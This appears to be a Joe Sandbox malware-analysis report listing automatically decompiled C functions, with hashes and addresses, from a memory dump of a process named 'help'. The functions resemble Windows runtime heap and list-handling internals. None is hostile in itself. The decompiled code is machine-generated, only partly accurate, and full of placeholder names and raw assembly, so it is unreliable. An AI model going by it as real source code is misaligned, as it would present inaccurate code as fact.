Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 9b9142402b39705faa720484230ad565f0389c3b4fa5de64fb327989469e156e
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 5C219275A00308EFDB20DF99C844E6AF7F8EB48314F1488AAE949EB651D374ED44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 037F3B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E037F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x38b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x38b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x38b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0380AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0380FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x38b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x38b84c4; // 0x0
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x037f3b89
0x037f3b96
0x037f3ba1
0x037f3bab
0x037f3bb5
0x037f3bb9
0x03836298
0x037f3bbf
0x037f3bc2
0x037f3bc3
0x037f3bc9
0x037f3bca
0x037f3bcc
0x037f3bcd
0x037f3bd4
0x037f3bd6
0x037f3bdb
0x037f3bea
0x037f3bf7
0x037f3bfb
0x037f3bff
0x037f3c09
0x037f3c0a
0x037f3c0b
0x037f3c0f
0x037f3c14
0x037f3c18
0x037f3c18
0x037f3bfb
0x037f3c1b
0x037f3c30
0x037f3c30
0x037f3c3d

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62743053dec39f6f18dbe38a5161e22e2b208b1b51ae22c723f60cc0435b5bb3
Instruction ID: 6e0ab1eead82c3de73e0ea13c57679e8f48f758091e5a054b2e563934320e803
Opcode Fuzzy Hash: 62743053dec39f6f18dbe38a5161e22e2b208b1b51ae22c723f60cc0435b5bb3
Instruction Fuzzy Hash: 9C21A172A00609AFD704EF98CD81F5AB7BDFB44708F2500A8EA08EB251D371EE15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03846CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03846CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E037E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E037E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x37a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E037FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E037FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03847016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L037E2400( &_v52);
								}
								_t21 = L037E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03846cfb
0x03846d00
0x03846d02
0x03846d06
0x03846d0a
0x03846d0e
0x03846d19
0x03846d2b
0x03846d1b
0x03846d24
0x03846d24
0x03846d33
0x03846d39
0x03846d46
0x03846d4f
0x03846d61
0x03846d51
0x03846d5a
0x03846d5a
0x03846d69
0x03846d6b
0x03846d6d
0x03846d6f
0x03846d6f
0x03846d74
0x03846d79
0x03846d7a
0x03846d7f
0x03846d82
0x03846d88
0x03846d89
0x03846d90
0x03846d94
0x03846da7
0x03846db1
0x03846db1
0x03846dbb
0x03846dbb
0x03846d90
0x03846d69
0x03846d46
0x03846dc6

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0397b7dd1ce1177a3e65b73a6981101f25ecab7f58a1340393e3b5412eb263
Instruction ID: 23fea52c2dc6a73dd87300fce06a9ad12f5c50160ec98c6b0f8f3b7f2e762c7a
Opcode Fuzzy Hash: dc0397b7dd1ce1177a3e65b73a6981101f25ecab7f58a1340393e3b5412eb263
Instruction Fuzzy Hash: 1321077250034D9FC311EFA8C948F67B7ECEF86644F080596F940DB651EB36C908C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0389070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0389070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E038907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0388AFDE( &_v8,  &_v12);
					E03891293(_t38, _v28, _t60);
					if(E037E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E038814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0389071b
0x03890724
0x03890734
0x03890738
0x0389074b
0x0389074b
0x03890753
0x03890753
0x03890759
0x0389075d
0x03890774
0x03890779
0x0389077d
0x03890789
0x03890795
0x038907a7
0x03890797
0x038907a0
0x038907a0
0x038907af
0x038907c4
0x038907cd
0x038907cd
0x038907af
0x038907dc

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 6fcf1971f368bd329545756d85f7af61188d9b992f11a99f44902e8eaeeebaa0
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 2121F576204204AFDB05DF98CC84A6ABBA5EFC4350F0885AAF955DF781DB30D909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03847794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03847794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x38b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0380F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E037E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03809AE0();
					_t24 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03847799
0x0384779a
0x0384779b
0x038477a3
0x038477ab
0x038477ae
0x038477b1
0x038477b1
0x038477bf
0x038477c4
0x038477c8
0x038477ce
0x038477d4
0x038477e0
0x038477e0
0x038477d6
0x038477d6
0x038477de
0x00000000
0x00000000
0x038477de
0x038477e5
0x038477f0
0x038477f3
0x038477f6
0x038477fd
0x03847800
0x0384780c
0x03847818
0x0384782b
0x0384781a
0x03847823
0x03847823
0x03847830
0x03847831
0x03847838
0x0384783d
0x0384783e
0x0384784f
0x0384784f
0x0384785a

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0686688f49716a1479bd593185c69908e0881adb120f06cb77870b0ba4aeae1b
Instruction ID: b52e948fa94edc12425b1b45bcd968e53355f191068fe60da0f0455dda5b5e15
Opcode Fuzzy Hash: 0686688f49716a1479bd593185c69908e0881adb120f06cb77870b0ba4aeae1b
Instruction Fuzzy Hash: 2F21A176500648ABC725DFA9DC84E6BB7A8EF8C340F1445ADF51ADBB90D734E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 037EAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E037EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E037E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E037E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E037E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E037E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03847794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x037eae78
0x037eae7c
0x037eae7e
0x037eae81
0x037eae86
0x037eae8d
0x03832691
0x037eae93
0x037eae93
0x037eae93
0x037eae98
0x037eae9d
0x038326a2
0x038326b4
0x038326a4
0x038326ad
0x038326ad
0x038326b9
0x00000000
0x038326bb
0x00000000
0x038326bb
0x037eaea3
0x037eaea3
0x037eaea3
0x037eaeaa
0x038326c0
0x038326c9
0x038326c9
0x037eaeb3
0x038326d4
0x038326e1
0x00000000
0x00000000
0x038326e7
0x038326ee
0x038326f0
0x038326f9
0x038326f9
0x03832702
0x03832708
0x03832708
0x0383270b
0x0383270f
0x03832711
0x03832711
0x03832725
0x03832725
0x00000000
0x037eaeb9
0x037eaeb9
0x037eaebf
0x037eaebf
0x037eaeb3

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 48aab7f8f89c5664b9e3db7c50d020e9cb11b4db46fd2959f1b564a3aea906de
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 34219D71A01685DFDB26DBA9D948B25B7E8AF49650F1D04E0ED04CB7A2E778DC40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 037FFD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E037FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E037D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x037ffd9b
0x037ffda0
0x037ffda1
0x037ffdab
0x037ffdad
0x037ffdb0
0x037ffdb8
0x037ffe0f
0x037ffde6
0x037ffde9
0x037ffdec
0x0383c0c0
0x037ffdfe
0x037ffe06
0x037ffe06
0x0383c0c8
0x037ffe2d
0x037ffe2d
0x00000000
0x037ffe2d
0x0383c0d1
0x0383c0e0
0x0383c0e5
0x0383c0e5
0x0383c0e8
0x00000000
0x0383c0e8
0x037ffdf4
0x00000000
0x00000000
0x037ffdf6
0x037ffdfa
0x037ffe1a
0x037ffe1f
0x037ffe1f
0x037ffdfc
0x00000000
0x037ffdfc
0x037ffdcc
0x037ffdd0
0x037ffe26
0x00000000
0x037ffe26
0x037ffdd8
0x037ffddb
0x037ffddd
0x037ffde0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 044a390a39fa1bcfbc37c8109237b82a8c6790ccdd648f2cb6d489bd61859fd3
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: FC217972A00A40DFC735CF4AC550A66F7E9FB94A10F2881AEEA499B715DB30AC00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 037FB390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E037FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E037E2280(_t12, 0x38b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E038000C2(0x38b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x037fb395
0x037fb3a2
0x037fb3a5
0x037fb3aa
0x037fb3b2
0x037fb3ba
0x037fb3bd
0x037fb3c0
0x037fb3c4
0x037fb3c9
0x0383a3e9
0x0383a3ed
0x0383a3f0
0x0383a3ff
0x0383a403
0x0383a409
0x00000000
0x00000000
0x0383a40b
0x0383a40b
0x0383a40f
0x0383a415
0x0383a423
0x0383a423
0x0383a415
0x037fb3d1
0x037fb3e8
0x037fb3e8
0x037fb3d9

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d900e233e38c22d3d01bc4a6809043043cffbd1764dede1e6214d04bef13bec6
Instruction ID: b1842dd9931762293f799491fafd8bc7c71ffedb86e5505003e3761d904736f6
Opcode Fuzzy Hash: d900e233e38c22d3d01bc4a6809043043cffbd1764dede1e6214d04bef13bec6
Instruction Fuzzy Hash: 7A114C373412145FCB1CDA54CD81A6B726AEFCA330B2901ADDE16CB390C9755C02C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 037C9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E037C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x389f708);
				E0381D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E038095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E038095D0();
				_t33 =  *0x38b84c4; // 0x0
				L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x38b84c4; // 0x0
				L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x38b84c4; // 0x0
				E037E2280(L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x38b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E038095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E038095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E037C9325();
					_t50 =  *0x38b84c4; // 0x0
					return E0381D0D1(L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x037c9240
0x037c9242
0x037c9247
0x037c924c
0x037c924e
0x037c9255
0x037c9257
0x037c925a
0x037c925f
0x037c925f
0x037c9266
0x037c9271
0x037c9276
0x037c9279
0x037c927e
0x037c9295
0x037c929a
0x037c92b1
0x037c92b6
0x037c92d7
0x037c92dc
0x037c92e0
0x037c92e6
0x037c92e8
0x037c92ee
0x037c9332
0x037c9333
0x037c9337
0x037c9338
0x037c933a
0x037c933a
0x037c933d
0x037c9342
0x037c9342
0x037c9345
0x037c9349
0x037c934e
0x037c9352
0x037c9357
0x037c92f4
0x037c92f4
0x037c92f6
0x037c92f9
0x037c9300
0x037c9306
0x037c9324
0x037c9324

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68eedb1a4338a32571d28ba3c69fc69b736c19566ebffc8b0c27e648e3b080c6
Instruction ID: cdbad64e0eb9d1bfbbf33000541865fb01396354455e5dcbfe8d4e54a1a21a72
Opcode Fuzzy Hash: 68eedb1a4338a32571d28ba3c69fc69b736c19566ebffc8b0c27e648e3b080c6
Instruction Fuzzy Hash: D0215736051A80DFC765EF68CA04F5AB7BDBF08704F0449ACE14A8A6A2DB34E951DB44

Uniqueness

Uniqueness Score: -1.00%

Function 03854257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E03854257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x38a08d0);
				E0381D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E038541E8(__ebx, __edi, __ecx, _t39);
				E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x38b87e4;
					_t18 =  *0x38b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x38b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x38b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x38b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L037C7055(_t31 + 0xfffffff8);
								_t24 =  *0x38b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x38b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x38b5cd0;
				if( *0x38b5cd0 <= 0) {
					L037C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x38b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x38b87e8 = _t30;
						 *0x38b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0381D0D1(L03854320());
			}

0x03854257
0x03854257
0x03854257
0x03854259
0x0385425e
0x03854263
0x03854265
0x03854273
0x03854278
0x0385427c
0x0385427f
0x03854281
0x03854287
0x038542d7
0x038542d7
0x038542da
0x0385428d
0x0385428d
0x0385428f
0x03854292
0x03854297
0x0385429c
0x038542a0
0x038542a6
0x038542a8
0x038542ae
0x038542b3
0x00000000
0x038542ba
0x038542ba
0x038542bf
0x038542c5
0x038542ca
0x038542cf
0x038542d0
0x00000000
0x038542d0
0x038542b3
0x00000000
0x038542a6
